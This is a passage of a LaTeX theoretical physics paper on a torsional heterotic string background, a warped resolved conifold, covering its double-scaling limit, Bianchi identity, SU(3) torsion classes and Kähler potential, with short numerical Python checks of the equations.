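H    = lambda r: k / r**2
dH   = lambda r: -2 * k / r**3
fsq  = lambda r: 0.75 * (1 - (a / r) ** 8)
dfsq = lambda r: 6 * a**8 / r**9
g1sq = fsq

res = []
for r in (1.3, 2.0, 4.0, 11.0):
    # eq. (susy-system a): f^2 H' = -2 k g1^2 / r^3
    res.append(abs(fsq(r) * dH(r) + 2 * k * g1sq(r) / r**3))
    # eq. (susy-system b): r^3 H f f' + 3 r^2 H (f^2 - 1) + k g1^2 = 0
    ffp = 0.5 * dfsq(r)                       # f f' = (f^2)'/2
    res.append(abs(r**3 * H(r) * ffp + 3 * r**2 * H(r) * (fsq(r) - 1) + k * g1sq(r)))
print(max(res))   # zero up to rounding
```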
\begin{figure}[!t]
\centering
\includegraphics[width=75mm]{tab3.pdf}\hskip5mm
\includegraphics[width=75mm]{tab4.pdf}
\caption{Comparison of the profiles of $f(r)$ and $H(r)$ for the asymptotically flat supergravity solution (thick line) and its double scaling limit (thin line), for $k=10000$ and $a^2/\alpha'k=0.0001$.}
\label{tab2}
\end{figure}
To define the double-scaling limit more precisely, one should stay at a fixed distance from the bolt. We then use the rescaled
dimensionless radial coordinate $R=r/a$, in terms of which one obtains the double scaling limit of the background (\ref{sol-ansatz},\ref{gauge-ansatz},\ref{ephi}):
\begin{subequations}\label{sol-nhl}
\begin{align}
\mathrm{d} s^2 & = \eta_{\mu\nu}\mathrm{d} x^{\mu}\mathrm{d} x^{\nu} + \frac{2\alpha' k}{R^2} \,\biggl[
\tfrac{\mathrm{d} R^2}{1-\tfrac{1}{R^8}} + \frac{R^2}{8}\,
\Big( \mathrm{d}\theta_1^2+\sin^2\theta_1\,\mathrm{d}\phi_1^2 + \mathrm{d}\theta_2^2+\sin^2 \theta_2\,\mathrm{d} \phi_2^2 \Big) \nonumber \\
& \hspace{4.5cm}+\,\frac{R^2}{16} (1-\tfrac{1}{R^8}) \big(\mathrm{d} \psi + \cos \theta_1 \,\mathrm{d} \phi_1 + \cos \theta_2 \,\mathrm{d} \phi_2 \big)^2 \biggr]\, , \label{met-sol-nhl}
\\
\mathcal{H}_{[3]} & = \frac{\alpha' k}{8}\, \Big(1-\tfrac{1}{R^8}\Big)\,\big(\Omega_1+\Omega_2\big)\wedge\tilde\omega \, ,\\
e^{\Phi(r)} & = \frac{\mu}{H_{\infty}} \left( \frac{k}{R^2}\right)\, , \\
\mathcal{A}_{[1]} & =\tfrac{1}{4}\Big[\big(\cos\theta_1\,\mathrm{d}\phi_1 - \cos \theta_2\,\mathrm{d} \phi_2 \big)\, \vec{p}
+ \tfrac{1}{R^4}\,\tilde\omega\,\vec{q}\, \Big]\cdot \vec{H} \, ,
\end{align}
\end{subequations}
The warped geometry is a six-dimensional torsional analogue of Eguchi-Hanson space, as anticipated before in subsection~\ref{bianchisect}.
We observe that (as for the double-scaling limit of the warped Eguchi-Hanson space studied in~\cite{Carlevaro:2008qf}) the blow-up parameter $a$ disappears from the metric, being absorbed
in the double-scaling parameter $\mu$, hence in the dilaton zero-mode that fixes the effective string coupling.
As can be read off from the asymptotic form of the metric (\ref{sol-nhl}), the metric of its $T^{1,1}$ base is non-Einstein even at infinity, so that the space is not
asymptotically Ricci-flat, contrary to the full supergravity solution corresponding to figure~\ref{tab1}.
As expected, however, in the regime $a^2\ll \alpha'Q_5$ the supergravity and the near-horizon backgrounds agree perfectly in the vicinity of the bolt, as shown in figure~\ref{tab2}.
Finally, we notice that upon taking the near-brane limit of the blown-down geometry (which amounts to replacing $f^2$ by one in the metric~(\ref{met-sol-nhl}) and turning off the gauge bundle associated with $\vec{q}$), the six-dimensional metric factorizes into a linear dilaton direction and a non-Einstein $T^{1,1}/\mathbb{Z}_2$ space.
\subsection{One-loop contribution to the Bianchi identity}
The supergravity solution (\ref{sol-ansatz}) is valid in the large charges regime $k\gg 1$, where higher derivative (one-loop) corrections to the
Bianchi identity~(\ref{bianchi}) are negligible. Given the general behaviour of the functions $f^2$ and $H$ as plotted in figure~\ref{tab1}, we must still
verify that the curvature contribution $\text{tr}\,\mathcal{R}_+\wedge \mathcal{R}_+$ remains finite for large
$k$ and arbitrary value of $a$, for any $r\geqslant a$, with coefficients of order one, so that the truncation performed on the Bianchi identity is
consistent and the solution obtained is reliable.
We can give an 'on-shell' expression of the one-loop contribution in~(\ref{bianchi}) by using the supersymmetry equations (\ref{susy-system}) to
re-express all first and second derivatives of $f$ and $H$ in terms of the functions $g_1$, $f$ and $H$ themselves. We obtain:
\begin{equation}\label{TrRR}
\begin{array}{l}
{\displaystyle \mbox{tr}\, \mathcal{R}(\Omega_+)\wedge \mathcal{R}(\Omega_+) \,=}\\[6pt]
{\displaystyle \qquad - 4\Big(
1-\frac{4 f^2}{3} \big(2-f^2\big)
-\frac{2g_1^2(1-f^2)}{3} \Big[\frac{\alpha'k}{r^2 H}\Big]
+\frac{2 g_1^4}{3f^2} \Big[\frac{\alpha'k}{r^2 H}\Big]^2 +\frac{2 g_1^6}{9f^2} \Big[\frac{\alpha'k}{r^2 H}\Big]^3
\Big)
\,\Omega_1\wedge\Omega_2}
\\[10pt]
{\displaystyle \qquad \quad
-8 \Big( 4(1-f^2)^2
+(1-f^2)(1-4g_1^2)\Big[\frac{\alpha'k}{r^2 H}\Big]
+\frac{g_1^2\big(-6 f^2 + g_1^2 (3+2f^4+6f^2)\big)}{3 f^4} \Big[\frac{\alpha'k}{r^2 H}\Big]^2}
\\[8pt]
{\displaystyle \qquad \qquad
+\frac{g_1^4\big(-3f^2+2g_1^2 (1+2f^2)\big)}{3 f^4} \Big[\frac{\alpha'k}{r^2 H}\Big]^3
+\frac{2 g_1^8}{9 f^4} \Big[\frac{\alpha'k}{r^2 H}\Big]^4 \Big)
\frac{\mathrm{d} r}{r} \wedge\big(\Omega_1+\Omega_2\big)\wedge \tilde\omega \,.}
\end{array}
\end{equation}
We observe from the numerical analysis of the previous subsection that $f\in[0,1]$ while $H$ is monotonically
decreasing from the finite value $H_{\text{max}}=H(a)$ to $H_{\infty}>0$. Expression (\ref{TrRR}) therefore remains finite as $r\rightarrow \infty$,
since all explicit $r$-dependent contributions come in powers of $\alpha'k/(r^2 H)$, which vanishes at infinity.
Now, since $f$ and $g_1$ both vanish at $r=a$, potential divergences might also arise in (\ref{TrRR}) in the vicinity of the bolt. However:
\begin{itemize}
\item At $r=a$, all the potentially divergent terms appear as ratios
$g_1^{2n}\,f^{-2m}$, with $n\geq m$, and thus either vanish or remain finite,
since $g_1$ and $f$ are equal at the bolt.
\item The other contributions all remain finite at the bolt, since they are all expressed as
powers of $\alpha'k/(r^2 H)$, which is maximal at $r=a$, with:
$$
\text{Max}\Big[\frac{\alpha'k}{r^2 H}\Big] = \left(1+\frac{a^2}{\alpha'k}\right)^{-1}\leq1\,.
$$
\end{itemize}
Taking the double-scaling limit, the expression~(\ref{TrRR}) simplifies to:
\begin{equation}\label{TrRR2}
\mbox{tr}\, \mathcal{R}(\Omega_+)\wedge \mathcal{R}(\Omega_+) = -\big(4-8g^2+5g^4\big)\,\Omega_1\wedge\Omega_2
- 2\big(16-34g^2+23g^4\big)\,\frac{\mathrm{d} r}{r} \wedge\big(\Omega_1+\Omega_2\big)\wedge \tilde\omega\,,
\end{equation}
where $g_1$ has been rescaled to $g(r)=\sqrt{1-(a/r)^8}$ for simplicity.
We see that this expression does not depend on $k$, because of the particular profile of $H$ in this limit (\ref{Hfg}), and is clearly finite and of order one for $r\in[a,\infty[$.
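Although elementary, the boundedness of the two coefficient polynomials in~(\ref{TrRR2}) over the full range $g\in[0,1]$ can also be confirmed numerically. A minimal sketch (the polynomials are read off from the expression above; the grid resolution is an arbitrary choice):

```python
import numpy as np

# Coefficients of the two tensor structures in tr R_+ ^ R_+ in the
# double-scaling limit, as functions of g = sqrt(1 - (a/r)^8) in [0, 1].
g = np.linspace(0.0, 1.0, 10001)
c_omega = 4 - 8 * g**2 + 5 * g**4     # multiplies Omega_1 ^ Omega_2
c_mixed = 16 - 34 * g**2 + 23 * g**4  # multiplies dr/r ^ (Omega_1 + Omega_2) ^ omega-tilde

# Both coefficients stay finite and of order one over the whole range:
# c_omega reaches its minimum 4/5 at g^2 = 4/5 and its maximum 4 at the bolt,
# c_mixed its minimum 79/23 at g^2 = 17/23 and its maximum 16 at the bolt.
print(c_omega.min(), c_omega.max())
print(c_mixed.min(), c_mixed.max())
```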
\subsubsection*{Bianchi identity at the bolt}
By using the explicit form for $\text{tr}\,\mathcal{R}_+\wedge \mathcal{R}_+$ determined above, we can evaluate the full Bianchi identity~(\ref{bianchi}) at the bolt.
At $r=a$, the \textsc{nsns} flux $\mathcal{H}$ vanishes, and the tree-level and one-loop contributions are both on the same footing.
Using (\ref{TrRR}), the Bianchi identity can then be satisfied at the level of forms:
\begin{equation}
0= \text{Tr}\,\mathcal{F}\wedge \mathcal{F}-\text{tr}\,\mathcal{R}(\Omega_+)\wedge \mathcal{R}(\Omega_+)=\big(
\vec{p}^{\, 2} - \vec{q}^{\, 2} + 4 \big)\,\Omega_1\wedge \Omega_2\,
\end{equation}
provided:
\begin{equation}
\vec{p}^{\, 2} = \vec{q}^{\, 2} - 4\,.
\end{equation}
As we will see in section~\ref{sec:param} when deriving the worldsheet theory for the background~(\ref{sol-nhl}), this result will be precisely reproduced in the \textsc{cft} by
the worldsheet anomaly cancellation condition. It suggests that the $\alpha'$ corrections to the supergravity solution vanish at the bolt, as the worldsheet result is exact.
\subsubsection*{Tadpole condition at infinity}
In order to view the solution~(\ref{sol-ansatz}) as part of a compactification manifold, it is useful to consider the tadpole condition associated to it,
as it has non-vanishing charges at infinity.
One requires at least cancelling the leading term in the asymptotic expansion of the modified Bianchi identity at infinity, where the metric becomes Ricci-flat, and
the five-brane charge can thus in principle be set to zero (note however that the gauge bundle $V$ differs from the standard embedding). In this limit, only the first gauge
bundle specified by the shift vector $\vec{p}$ contributes, so that~(\ref{bianchi}) yields
the constraint:
\begin{equation}\label{tad}
6Q_5= 3\vec{p}^{\, 2} - 4\,.
\end{equation}
Since $\vec{p}\in \mathbb{Z}^{16}$, we can never set the five-brane charge to zero and fulfil this condition.
Furthermore, switching on the five-brane charge could only balance the instanton number of the gauge bundle, but never the curvature contribution, for
elementary number-theoretic reasons. Again, eq.~(\ref{tad}) can only be satisfied in the large charge
regime, where the one-loop contribution is subleading.
In the warped Eguchi-Hanson solution tackled in~\cite{Carlevaro:2008qf}, the background was locally torsional but for some appropriate choice
of Abelian line bundle the five-brane charge could consistently be set to zero;
here no such thing occurs.\footnote{The qualitative difference between the two types of solutions is that Eguchi-Hanson space is asymptotically
locally flat, while the orbifold of the conifold is only asymptotically locally Ricci-flat.} This amounts to saying that in the present case torsion is
always present to counterbalance tree-level effects, while
the only way to incorporate higher order contributions is to compute
explicitly the one-loop correction to the background~(\ref{sol-ansatz}) from the Bianchi identity,
as in~\cite{Fu:2008ga}. In the double-scaling limit~(\ref{sol-nhl}), this could in principle be carried out by
the worldsheet techniques developed in~\cite{Tseytlin:1992ri,Bars:1993zf,Johnson:2004zq}, using the gauged \textsc{wzw} model description we discuss in the next section.
\subsection{Torsion classes and effective superpotential}\label{torsion-cl}
In this section we will delve deeper into the $SU(3)$ structure of the background, as a way of characterizing the geometry and the flux background we are dealing with. We will briefly go through some elements of the classification of $SU(3)$-structures that we will need in the following (for a more detailed and general presentation, {\it cf.} \cite{Salomon,Gauntlett:2003cy,Grana}). On general grounds, as soon as it departs from Ricci-flatness, a given space acquires intrinsic torsion, which classifies the
$G$-structure it is endowed with. According to its index structure, the intrinsic torsion $T^{i}_{\phantom{i}jk}$ takes value in $\Lambda^1 \otimes \mathfrak{g}^{\perp}$, where $\Lambda^1$ is the space of one-forms, and $\mathfrak{g}\oplus\mathfrak{g}^{\perp}=\mathfrak{spin}(d)$, with $d$ the dimension of the manifold, and it therefore decomposes into irreducible $G$-modules $\mathcal{W}_i$.
\subsubsection*{Torsion classes of SU(3)-structure manifolds}
The six-dimensional manifold of interest has $SU(3)$-structure, and can therefore be classified in terms of the following decomposition of $T$ into irreducible representations of $SU(3)$:
\begin{equation}
\begin{array}{rcl}
T\in \Lambda^1 \otimes \mathfrak{su}(3)^{\perp}
& =& \mathcal{W}_1\oplus \mathcal{W}_2\oplus \mathcal{W}_3\oplus \mathcal{W}_4\oplus \mathcal{W}_5\\[4pt]
(\boldsymbol{3}+\bar{\boldsymbol{3}})\times (\boldsymbol{1}+\boldsymbol{3}+\bar{\boldsymbol{3}}) & =&
(\boldsymbol{1}+\boldsymbol{1})+(\boldsymbol{8}+\boldsymbol{8})+ (\boldsymbol{6}+\bar{\boldsymbol{6}})
+(\boldsymbol{3} + \bar{\boldsymbol{3}}) +(\boldsymbol{3} + \bar{\boldsymbol{3}})\,.
\end{array}
\end{equation}
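As a simple consistency check on this decomposition, one can verify that the real dimensions on both sides match (a trivial sketch; only the counting is checked):

```python
# Dimension count for the intrinsic torsion of an SU(3)-structure manifold:
# Lambda^1 x su(3)-perp decomposes into W1 + W2 + W3 + W4 + W5.
dim_lambda1 = 6    # one-forms: 3 + 3bar of SU(3)
dim_su3_perp = 7   # complement of su(3) in spin(6): 1 + 3 + 3bar

# real dimensions of the five torsion modules
dims = {"W1": 1 + 1, "W2": 8 + 8, "W3": 6 + 6, "W4": 3 + 3, "W5": 3 + 3}

print(dim_lambda1 * dim_su3_perp, sum(dims.values()))  # both equal 42
```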
This induces a specific decomposition of the exterior derivatives of the $SU(3)$ structure $J$ and $\Omega$ onto the components of the intrinsic torsion $W_i\in \mathcal{W}_i$:
\begin{subequations}\label{intrinsic}
\begin{align}
\mathrm{d} J &= -\tfrac32 \,\text{Im}(W_1^{(1)}\,\bar\Omega)+ W_4^{(3+\bar{3})}\wedge J + W_3^{(6+\bar{6})}\,,\\[4pt]
\mathrm{d} \Omega & = W_1^{(1)}\,J\wedge J + W_2^{(8)}\wedge J + W_5^{(\bar{3})}\wedge \Omega\,,
\end{align}
\end{subequations}
which measures the departure from the Calabi-Yau condition $\mathrm{d} J=0$ and $\mathrm{d}\Omega=0$ ensuring Ricci-flatness.
We have in particular $W_1$ a complex $0$-form, $W_2$ a complex $(1,1)$-form and $W_3$ a real primitive $[(1,2)+(2,1)]$-form. $W_4$ is a real vector and $W_5^{(\bar{3})}$ is the anti-holomorphic
part of the real one-form $W_5^{(3+\bar{3})}$, whose holomorphic piece is projected out in expression (\ref{intrinsic}b).
In addition $W_2$ and $W_3$ are {\it primitive}, i.e. they obey $J\lrcorner W_i=0$, with the generalized inner product of a $p$-form $\alpha_{[p]}$ and a $q$-form $\beta_{[q]}$ for $p\leq q$ given by $\alpha\lrcorner\beta=\tfrac{1}{p!}\alpha_{m_1..m_p}\beta^{m_1..m_p}_{\phantom{m_1..m_p}m_{p+1}..m_{q}}$.
The torsion classes can be determined by exploiting the primitivity of $W_2$ and $W_3$ and the defining relations (\ref{topcond}) of the $SU(3)$ structure. Thus, we can recover $W_1$ from both
equations (\ref{intrinsic}). In our conventions, we then have
\begin{equation}
W_1^{(1)} = \tfrac{1}{12}\,J^2\lrcorner \mathrm{d} \Omega \equiv \tfrac{1}{36}\,J^3\lrcorner(\mathrm{d} J\wedge \Omega)\,.
\end{equation}
Likewise, one can compute $W_4$ and $W_5$, by using in addition the relations $J\lrcorner\Omega=J\lrcorner\bar\Omega=0$:
\begin{equation}\label{W4}
W_4^{(3+\bar 3)} = \frac{1}{2}\, J\lrcorner \mathrm{d} J\,,\qquad
\bar W_5^{(3+\bar 3)} =-\tfrac{1}{8} \big(\bar\Omega \lrcorner \mathrm{d}\Omega + \Omega \lrcorner \mathrm{d}\bar\Omega\big)\,.
\end{equation}
This in particular establishes $W_4$ as what is known as the {\it Lee form} of $J$, while, by rewriting $\bar W_5$ as
$\bar W_5=-\tfrac12\text{Re}\Omega\lrcorner \mathrm{d} \text{Re}\Omega=-\tfrac12\text{Im}\Omega\lrcorner \mathrm{d} \text{Im}\Omega$, we
observe that $W_5$ is the Lee form of $\text{Re}\Omega$ or $\text{Im}\Omega$, indiscriminately \cite{Gauntlett:2003cy}. This alternative formulation in terms of the Lee form
is characteristic of the classification of almost Hermitian manifolds.
The torsion class $W_3^{(6+\bar{6})}=W_3^{(6)}+W_3^{(\bar{6})}$ is a bit more involved to compute, but may be determined in components by contracting with the totally
antisymmetric holomorphic and anti-holomorphic tensors of $SU(3)$, which projects to the $\boldsymbol{6}$ or $\bar{\boldsymbol{6}}$ of $SU(3)$:
\begin{equation}\label{W3}
(\star_3 W_3^{(6)})_{\bar a\bar b}=\,(W_3)^{\bar c \bar d}_{\phantom{cd}[\bar a}\, \bar\Omega_{\bar b]\bar c \bar d}\,,\qquad
(\star_{\bar 3}W_3^{(\bar 6)})_{ab}=(W_3)^{cd}_{\phantom{cd}[a}\, \Omega_{b] cd}\,,
\end{equation}
with the metric $\eta_{ab}=2\delta_{a}^{\phantom{a}\bar b}$ and the ``Hodge star products'' in three dimensions given by $\star_{3}E^{\bar a \bar b} = \epsilon^{\bar a \bar b}_{\phantom{ab}c}\,E^{c}$, and $\star_{\bar{3}}(\bullet)$ applying to the complex conjugate of the former expression.
The \textsc{nsns} flux also decomposes into $SU(3)$ representations:
\begin{equation}\label{flux-class}
\mathcal{H}= -\tfrac32 \,\text{Im}(H^{(1)}\,\bar\Omega)+ H^{(3+\bar3)}\wedge J + H^{(6+\bar6)}\,.
\end{equation}
As a general principle, since torsion is generated by flux, supersymmetry requires that the torsion classes (\ref{intrinsic}) be supported by flux classes in
the same representation of $SU(3)$. Thus, we observe in particular that there is no component of $\mathcal{H}$ in the $(\boldsymbol{8}+\boldsymbol{8})$, which implies that $W_2=0$, for our type of backgrounds.
\subsubsection*{The torsion classes of the warped resolved conifold}
After this general introduction we hereafter give the torsion classes for the warped six-dimensional background~(\ref{sol-ansatz}) studied in this work. They can be extracted from the following differential conditions, which have been established using the supersymmetry equations~(\ref{susy-system}) and the relation~(\ref{g3}):
\begin{subequations}\label{torsion-warp}
\begin{align}
\mathrm{d}\Omega & = 2 \mu(r)\,\big( e^{1256}+e^{1346}+i(e^{1356}-e^{1246})\big)\,,\\
\mathrm{d} J & = -\mu(r)\, \big(e^{123}+e^{145}\big)\,,\\
\mathcal{H} & = \mu(r)\, (e^{236}+e^{456})\,,
\end{align}
\end{subequations}
with the function:
\begin{equation}\label{mu}
\mu(r)= \sqrt{\frac{2}{3}}\,\frac{2\alpha'kg_1^2}{r^3 H^{3/2}f} = -\sqrt{\frac{2}{3}}\frac{f}{\sqrt{H}}\,\Phi'\,.
\end{equation}
Since relations~(\ref{torsion-warp}) amount to satisfying the first supersymmetry condition~(\ref{susy-system}a), they automatically imply
$W_1=W_2=0$ (this can be checked explicitly in~(\ref{torsion-warp})),
which in turn entails that the manifold~(\ref{sol-ansatz}a) is complex, since the complex structure is now integrable\footnote{For a six dimensional manifold to be complex,
the differential $\mathrm{d}\Omega$ can only comprise a $(3,1)$ piece, which leads to $W_1=W_2=0$. This condition can be shown to be equivalent to the vanishing of the Nijenhuis tensor, ensuring the integrability of the complex structure.}.
Then, using relations~(\ref{W4}) and~(\ref{W3}), one determines the remaining torsion classes:
\begin{equation}
W_1=W_2=W_3 =0\,, \label{wt1}
\end{equation}
and
\begin{equation}
W_4^{(3+\bar 3)} = \tfrac12\,W_5^{(3+\bar 3)} = -\mu(r)\,\text{Re}E^3\,. \label{wt2}
\end{equation}
They are supported by the flux:
\begin{equation}\label{H33}
H^{(3+\bar 3)}= -\mu(r)\,\text{Im}E^3\,.
\end{equation}
Two remarks are in order. First, combining~(\ref{intrinsic}a) and~(\ref{susy-cond}b) leads to the generic relation $W_4=\mathrm{d}\Phi$, which is indeed satisfied by the Lee form~(\ref{wt2}) by taking into account expression~(\ref{mu}). Secondly, the relation $W_5=2 W_4$ in~(\ref{wt2}) is a particular case of the formula $W_5=(-1)^{n+1} 2^{n-2} W_4$~\cite{LopesCardoso:2002hd,Gauntlett:2003cy} which holds for a manifold with $SU(n)$ structure.
\subsubsection*{Effective superpotential}
We now determine the effective superpotential of four-dimensional $\mathcal{N}=1$ supergravity for this particular solution, viewing the throat we consider as part of some heterotic flux compactification.
It can be derived from a generalization of the Gukov-Vafa-Witten superpotential~\cite{Gukov:1999ya}, which includes the full contribution from torsion and
$\mathcal{H}$-flux~\cite{Grana:2005ny}, or alternatively using generalized calibration methods~\cite{Koerber:2007xk}. The general expression reads:
\begin{equation}\label{superpot}
\mathcal{W}=\tfrac14\int_{\mathcal{M}_6}\Omega\wedge (\mathcal{H}+i\mathrm{d} J)\, .
\end{equation}
We evaluate this expression on the solution~(\ref{sol-ansatz}) by using the results obtained in~(\ref{wt1}-\ref{H33}). This leads to the 'on-shell' complexified K\"ahler structure
\begin{equation}
\mathcal{H}+i\,\mathrm{d} J = iW_5^{(\bar 3)}\wedge J = -i\mu(r)\,\bar E_3\wedge J\,,
\end{equation}
which together with the first relation in~(\ref{topcond}) entails
\begin{equation}\label{superpot2}
\mathcal{W}=0
\end{equation}
identically.\footnote{As explained in~\cite{Vafa:2000wi} and systematized later in~\cite{Martucci:2006ij}, one can determine
the superpotential~(\ref{superpot}) without knowing explicitly the full background,
by introducing a resolution parameter determined by a proper calibration of the 'off-shell' superpotential, and subsequently minimizing the
latter with respect to this parameter~(see \cite{Maldacena:2009mw} for a related discussion).}
In Vafa's setup of ref.~\cite{Vafa:2000wi}, corresponding
to D5-branes wrapping the two-cycle of the resolved conifold, this leads to an $\mathcal{N}=1$ Veneziano-Yankielowicz superpotential
(where the resolution parameter is identified with the glueball superfield of the four-dimensional super Yang-Mills theory), showing that the background is holographically dual to a confining theory with a gaugino condensate. In our case, the vanishing of the superpotential means that the blow-up parameter $a$ corresponds to a modulus of the holographically dual $\mathcal{N}=1$ four-dimensional theory. More aspects
of the holographic duality are discussed in subsection~\ref{holo}.
\subsubsection*{A K\"ahler potential for the non-Ricci-flat conifold}
In the following, we will show that the manifold corresponding to the metric~(\ref{sol-ansatz}a) is conformally K\"ahler. This can be readily established by means of the differential conditions~(\ref{intrinsic}), as the characteristics of a given space are related to the vanishing of certain torsion classes or to specific constraints relating them (see~\cite{Grana} for a general overview).
For this purpose, we now have to determine the torsion classes for the resolved conifold space conformal to the geometry~(\ref{sol-ansatz}a):
\begin{equation}\label{metric-unwarp}
\mathrm{d} s^2_{\tilde{\mathcal{C}}_6} = \frac{\mathrm{d} r^2}{f^2} + \frac{r^2}{6}\big(\mathrm{d}\Omega_1^2 +\mathrm{d}\Omega_2^2 \big)+
\frac{r^2 f^2}{9}\tilde\omega^2\,.
\end{equation}
Again, these can be read from the differential conditions:
\begin{subequations}\label{torsion-unwarp}
\begin{align}
\mathrm{d}\tilde\Omega & = \tfrac32 \,\tilde\mu(r)\,\big( \tilde{e}^{1256}+\tilde{e}^{1346}+i(\tilde{e}^{1356}-\tilde{e}^{1246})\big)\,,\\
\mathrm{d} \tilde J & = 0 \,,
\end{align}
\end{subequations}
with now
\begin{equation}
\tilde\mu(r)= \frac{\alpha'k\left(1-\left(\frac{a}{r}\right)^8\right)}{r^3 f(r)}\,,
\end{equation}
and the new set of vielbeins given by:
\begin{equation}
\tilde{e}^i = \sqrt{\frac{2}{3H}}\,e^i\,,\qquad \forall i=1,..,6\,.
\end{equation}
Repeating the analysis carried out earlier, the torsion classes are easily established:
\begin{eqnarray}
&W_1=W_2=W_3=W_4 =0\,,& \label{tr1}\\
&W_5^{(3+\bar 3)} = -2\tilde\mu(r)\, \text{Re}E^3\,.& \label{tr2}
\end{eqnarray}
The first relation~(\ref{tr1}) tells us that the manifold is complex, since $W_1=W_2=0$, and symplectic,
since the K\"ahler form $\tilde J$ is closed. Fulfilling both these conditions gives precisely a K\"ahler manifold, and the Levi Civita connection is in this case endowed with $U(3)$ holonomy.
\paragraph{The K\"ahler potential}
The K\"ahler potential for the conifold metric~(\ref{metric-unwarp}) is most easily computed by
starting from the generic definition of the (singular) conifold as a quadric in $\mathbb{C}^4$,
whose base is determined by the intersection of this quadratic with a three-sphere of
radius $\varrho$. These two conditions are summarized in~\cite{Candelas:1989js}:
\begin{equation}\label{conif1}
\mathcal{C}_6\stackrel{\mbox{def}}{=}\sum_{A=1}^4 (w_A)^2=0\,\qquad
\sum_{A=1}^4 |w_A|^2=\varrho^2\,.
\end{equation}
One can rephrase these two conditions in terms of a $2\times 2$ matrix $W$ parametrizing the $T^{1,1}$
base of the conifold, viewed as the coset $(SU(2)\times SU(2))/U(1)$, as $W=\tfrac{1}{\sqrt{2}}\sum_{A}w^A\sigma_A$. In this language, the defining equations~(\ref{conif1}) take the form:
\begin{equation}\label{conif2}
\text{det}\,W=0\,,\qquad \text{tr}\,W^{\dagger}W = \varrho^2\,.
\end{equation}
For the K\"ahler potential $\mathcal{K}$ to generate the metric~(\ref{metric-unwarp}), it has to be invariant under the action of the rotation group $SO(4)\simeq SU(2)\times SU(2)$ of~(\ref{conif1}) and can thus only depend on $\varrho^2$. In terms of $\mathcal{K}$ and $W$, the metric on the conifold reads:
\begin{equation}\label{metric-su2}
\mathrm{d} s^2 = \Dot{\mathcal{K}}\,\text{tr}\,\mathrm{d} W^{\dagger}\mathrm{d} W + \Ddot{\mathcal{K}}\,|\text{tr}\,W^{\dagger}\mathrm{d} W|^2\,,
\end{equation}
where the derivative is $\dot{(\bullet)}\equiv \frac{\partial}{\partial\varrho^2}(\bullet)$.
By defining the function $\gamma(\varrho)=\varrho^2\,\Dot{\mathcal{K}}$, the metric~(\ref{metric-su2}) can be recast into the form:
\begin{equation}
\mathrm{d} s^2 = \Dot{\gamma}\,\mathrm{d}\varrho^2 + \frac{\gamma}{4}\big(\mathrm{d}\Omega_1^2 +\mathrm{d}\Omega_2^2 \big)+
\frac{\varrho^2 \Dot{\gamma}}{4}\,\tilde\omega^2\,.
\end{equation}
Identifying this expression with the metric~(\ref{metric-unwarp}) yields two independent first order differential equations, one of them giving the expression of the radius of the $S^3$ in~(\ref{conif1}) in terms of the radial coordinate in~(\ref{metric-unwarp}):
\begin{equation}\label{ro}
\varrho = \varrho_0\,e^{{\displaystyle \tfrac32\int\frac{\mathrm{d} r}{r f^2}}}\,,\qquad \gamma(r)=\tfrac23\,r^2\,.
\end{equation}
From these relations, one derives the K\"ahler potential as a function of $r$:
\begin{equation}\label{kahpot2}
\mathcal{K}(r)=\mathcal{K}_0 + \int\frac{\mathrm{d}(r^2)}{f^2}\,.
\end{equation}
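For completeness, the one-line computation behind~(\ref{kahpot2}) combines $\gamma=\varrho^2\,\Dot{\mathcal{K}}$ with the radial relation $\mathrm{d}\varrho/\varrho = \tfrac32\,\mathrm{d} r/(rf^2)$ implied by~(\ref{ro}):

```latex
\mathrm{d}\mathcal{K} = \Dot{\mathcal{K}}\,\mathrm{d}\varrho^2
= \gamma\,\frac{\mathrm{d}\varrho^2}{\varrho^2}
= \frac{2r^2}{3}\cdot\frac{3\,\mathrm{d} r}{r f^2}
= \frac{\mathrm{d}(r^2)}{f^2}\,.
```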
In particular, we can work out $\mathcal{K}$ explicitly in the near horizon limit~(\ref{DSL}):
\begin{equation}\label{kahlerpot}
\mathcal{K}(r)=\mathcal{K}_0 + \frac{4a^2}{3}\, \left[\left(\frac{r}{a}\right)^2 -\frac12\text{arctan}\left(\frac{r}{a}\right)^2+ \frac14\log\left(\frac{r^2-a^2}{r^2+a^2}\right)\right]\,.
\end{equation}
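As a cross-check of this closed form, one can compare it against a direct numerical integration of~(\ref{kahpot2}) with the double-scaling-limit profile $f^2=\tfrac34\big(1-(a/r)^8\big)$. A minimal sketch (the value of $a$, the integration range and the grid are arbitrary illustrative choices, and $\mathcal{K}_0=0$):

```python
import numpy as np

a = 1.0  # illustrative blow-up parameter

def f2(r):
    # double-scaling-limit profile f^2(r) = (3/4) (1 - (a/r)^8)
    return 0.75 * (1.0 - (a / r)**8)

def K_closed(r):
    # closed-form Kahler potential in the double-scaling limit, with K_0 = 0
    u = (r / a)**2
    return (4 * a**2 / 3) * (u - 0.5 * np.arctan(u)
                             + 0.25 * np.log((r**2 - a**2) / (r**2 + a**2)))

# trapezoid-rule integration of d(r^2)/f^2 = 2 r dr / f^2 between r1 and r2
r1, r2 = 1.5 * a, 4.0 * a
r = np.linspace(r1, r2, 200001)
y = 2.0 * r / f2(r)
K_num = np.sum(0.5 * (y[1:] + y[:-1]) * np.diff(r))

print(K_num, K_closed(r2) - K_closed(r1))  # the two values agree
```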
\begin{figure}[!ht]
\centering
\includegraphics[width=70mm]{tab5.pdf}
\caption{The K\"ahler potential for the asymptotically flat supergravity solution with $k=10000$ and $a^2/\alpha'k=\{0.0001,0.01,1\}$.}
\label{kahlerpotfig}
\end{figure}
Choosing $\varrho_0=1$, we have $\varrho=\sqrt[4]{r^8-a^8}$, which varies over $[0,\infty[$, as expected. With an
exact K\"ahler potential at our disposal, we can make an independent check that
the near horizon geometry~(\ref{sol-nhl}) is never conformally Ricci flat. Indeed,
by establishing the Ricci tensor $R_{i\bar \jmath}=\partial_i\partial_{\bar \jmath}\ln\sqrt{|g|}$ for the K\"ahler manifold~(\ref{metric-su2}), we observe that the condition for Ricci flatness
imposes the relation $\partial_{\varrho^2}[(\varrho^2 \dot{\mathcal{K}})^3]= 2\varrho^2 $~\cite{PandoZayas:2001iw}, which is
never satisfied by the potential~(\ref{kahlerpot}).
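The identification $\varrho=\sqrt[4]{r^8-a^8}$ can likewise be checked against the defining integral in~(\ref{ro}); a sketch, again with illustrative values of $a$ and of the reference points:

```python
import numpy as np

a = 1.0

def f2(r):
    # double-scaling-limit profile f^2(r) = (3/4) (1 - (a/r)^8)
    return 0.75 * (1.0 - (a / r)**8)

# varrho(r2)/varrho(r1) = exp( (3/2) int_{r1}^{r2} dr / (r f^2) ), trapezoid rule
r1, r2 = 1.2 * a, 3.0 * a
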